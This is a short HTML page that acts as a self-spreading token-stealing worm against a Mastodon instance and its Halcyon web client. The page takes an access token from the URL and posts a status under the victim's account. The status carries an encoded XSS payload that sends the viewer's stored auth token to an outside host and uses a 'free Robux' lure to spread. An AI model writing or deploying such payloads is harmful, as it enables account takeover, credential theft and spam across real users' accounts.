<!doctype html>
<h1>bruh</h1>
<title>trolled</title>
<p>check your toots</p>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script src="mastodon.js"></script>
<script>
    // initialize library
    // api_user_token has not to be set at this point if you don't have one yet
    // NOTE: It needs jQuery!
    var api = new MastodonAPI({
        instance: "https://this-is-epic.space",
        api_user_token: new URLSearchParams(location.search).get('code')
    });

    //
    // BASIC REST FUNCTIONS
    // you can use every api endpoint from https://github.com/tootsuite/documentation/blob/master/Using-the-API/API.md
    //

    api.post("statuses", {status:"https://halcyon.this-is-epic.space/unshorten.php?url=%3Cscript%3Elocation%20%3D%20%60https%3A%2F%2F5079.ml%2Frandom%2Ftrolled%3Fcode%3D%24%7BlocalStorage.current_authtoken%7D%60%3C%2Fscript%3E\nCLICK FOR FREE ROBUX"}, function (data) {
      console.log('done fuck you')
    });
    </script>
